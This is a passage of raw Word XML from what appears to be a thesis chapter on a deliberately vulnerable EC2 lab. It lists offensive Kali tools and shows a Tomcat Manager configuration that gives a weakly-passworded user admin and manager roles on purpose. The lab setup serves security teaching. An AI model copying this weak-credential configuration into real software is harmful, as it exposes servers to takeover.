          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments of</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00662484" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EC2 Instances</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidR="00662484" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC5E03" w14:textId="08C1720D" w:rsidR="005B655F" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The VulnWeb EC2 instance was configured with intentional vulnerabilities to create a realistic multi-layered attack scenario. These configurations simulate common security weaknesses found in production environments, enabling comprehensive testing of penetration methodologies from initial access through privilege escalation to root compromise. Each misconfiguration represents real-world security mistakes that, when chained together, demonstrate the cumulative impact of seemingly minor vulnerabilities. The </w:t>
      </w:r>
      <w:r w:rsidR="00BF6F74" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">tools </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>needed to simulate the penetration test attack are shown in Table 4.20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4BE915" w14:textId="77777777" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="749D50EA" w14:textId="77777777" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020981EB" w14:textId="77777777" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E2848E" w14:textId="77777777" w:rsidR="009025BF" w:rsidRDefault="009025BF" w:rsidP="00317F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F63827" w14:textId="77777777" w:rsidR="00512AA9" w:rsidRPr="00D77DFE" w:rsidRDefault="00512AA9" w:rsidP="00317F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780D4300" w14:textId="48D521AF" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 4.20: Tools in Kali machine</w:t>
      </w:r>
      <w:r w:rsidR="00512AA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1261"/>
        <w:gridCol w:w="2452"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="3592"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="603BF5A7" w14:textId="1A791747" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68C6DCC5" w14:textId="360AF0BE"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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3010681B" w14:textId="19C469AC"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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007694ED" w14:textId="241CBD6B"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="327EC6F3" w14:textId="6E0C3B55"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="33DA89B4" w14:textId="44A32F0B" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="774BF24A" w14:textId="14E4055F"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hydra </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="379AF865" w14:textId="35253DBB"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/usr/bin/hydra </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F3809BD" w14:textId="78E3C9B3"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Hydra v9.5 (c) 2023 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43509FDF" w14:textId="6DD7B7DA" w:rsidR="00705F6E" w:rsidRPr="00D77DFE" w:rsidRDefault="00F62EB4" w:rsidP="003F32CC">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">systematically attempts to authenticate to a target service by trying </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>a large number of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> username and password combinations from custom or predefined wordlists</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="26453463" w14:textId="071216EA" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E18366" w14:textId="261F5C59"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john               </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="237AC50F" w14:textId="3AB01A6B"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/usr/sbin/john </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37E6A498" w14:textId="00411599"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version 1.9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C05CDDF" w14:textId="34187A98"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Uses dictionary attacks and brute-force methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="0CE616B4" w14:textId="65B7CD0F" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F77349" w14:textId="1389C193"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nmap               </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B0E8FA2" w14:textId="16CCE893"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/usr/bin/nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78A92B11" w14:textId="6E202C8F"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Nmap version 7.94SVN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5742AB9D" w14:textId="4B1C1809"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network discovery and security auditing tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="563B9DFD" w14:textId="33BE86D8" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72019DAD" w14:textId="5BE63CE3"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Metasploit Framework</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE" w:rsidDel="00F62EB4">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430AEF15" w14:textId="60484EF0"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/usr/bin/msfconsole            </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1582CE93" w14:textId="71B8BB08"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Framework Version: 6.4.91-dev-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F47DA05" w14:textId="6A4260CC"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Tool </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>to  find</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, exploit, and validate vulnerabilities in systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="3169E99B" w14:textId="7283CB94" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D56D6AD" w14:textId="5ECBBA02"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netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37768F1A" w14:textId="3B36CFF2"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/usr/bin/netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A5CB3C8" w14:textId="0ED96029"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Netcat 0.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4525DDD5" w14:textId="57B06DBE"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Tool to read and write data across network connections using TCP or UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="028EB213" w14:textId="58BC11F7" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DB0CB6" w14:textId="3FF01743"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tcpdump            </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658387B8" w14:textId="1FB5EE22"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xml:space="preserve">/usr/bin/tcpdump               </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01FA8360" w14:textId="0EF71EB1"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tcpdump version 4.99.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="420A058D" w14:textId="4273BD51"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 packet analyzer that captures and displays network traffic </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="1BEF3597" w14:textId="1583BD61" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40667418" w14:textId="5A7DE1B5"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ffuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35809177" w14:textId="1D83A142"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/usr/bin/ffuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2059466B" w14:textId="2ABAB40C"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Fuzz Faster U Fool - v2.1.0-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A04ECD4" w14:textId="2515DEB1"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Tool to discover hidden directories, files, and API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="4EC43785" w14:textId="29FE82DE" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49B4E5F5" w14:textId="222BAD02"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Burp Suite Community</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE6B15C" w14:textId="13477B07"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/usr/bin/burpsuite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C2EE998" w14:textId="2F62D93C"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Burp Suite version 2025.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23EF503F" w14:textId="71778549"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tool for security assessment and penetration testing of web applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="4FB6E549" w14:textId="2EE6534F" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EBDF9D6" w14:textId="3771CA60"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OWASP ZAP Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29264383" w14:textId="1E131CCC"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/usr/share/zaproxy/zap.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BF8B7FB" w14:textId="0C1BD4F6"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ZAP 2.16.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5516D00B" w14:textId="50153039"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open-source web application security scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="2F668AB5" w14:textId="673827BC" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C091B9" w14:textId="579A0195"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linpeas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA347FC" w14:textId="4C59C077"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/usr/bin/linpeas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C0D9052" w14:textId="5A5AD17D" w:rsidR="00705F6E" w:rsidRPr="00D77DFE" w:rsidRDefault="00705F6E" w:rsidP="003F32CC">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:tooltip="linpeasv2.6.8" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>linpeas v2.6.8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70594D28" w14:textId="711C4454"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Tool to automate the discovery of potential privilege escalation paths on Linux/Unix hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F62EB4" w:rsidRPr="00D77DFE" w14:paraId="689A1F1C" w14:textId="2CF1ED05" w:rsidTr="009E5B3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F013957" w14:textId="0163FBE1"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steghide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2459" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D018CFB" w14:textId="2C89DAFA"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/usr/bin/steghide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F8A52E0" w14:textId="1C142D2B" w:rsidR="00705F6E" w:rsidRPr="00D77DFE" w:rsidRDefault="00705F6E"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Steghide 0.5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581EAB76" w14:textId="509C6FF0" w:rsidR="00705F6E" w:rsidRPr="00D77DFE" w:rsidRDefault="00F62EB4" w:rsidP="003F32CC">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tool that hides secret data inside cover files such as JPEG, BMP, WAV, or AU files, making the hidden data invisible to casual inspection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="692FEE4C" w14:textId="77777777" w:rsidR="00574D69" w:rsidRPr="00D77DFE" w:rsidRDefault="00574D69" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDAA07D" w14:textId="360C4CFA" w:rsidR="00574D69" w:rsidRPr="00D77DFE" w:rsidRDefault="00574D69" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc223521112"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.4.1 Apache Tomcat Manager Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="47884076" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="009025BF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Apache Tomcat Manager provides administrative functionality for web application deployment. The configuration simulates weak credential practices common in enterprise environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9E087" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Configuration Modified:</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/tomcat9/conf/tomcat-users.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F1B0F" w14:textId="400B4FA8" w:rsidR="00574D69" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;user username="gdyniafort" password="baltic2025" roles="manager-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gui,manager</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>script,admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
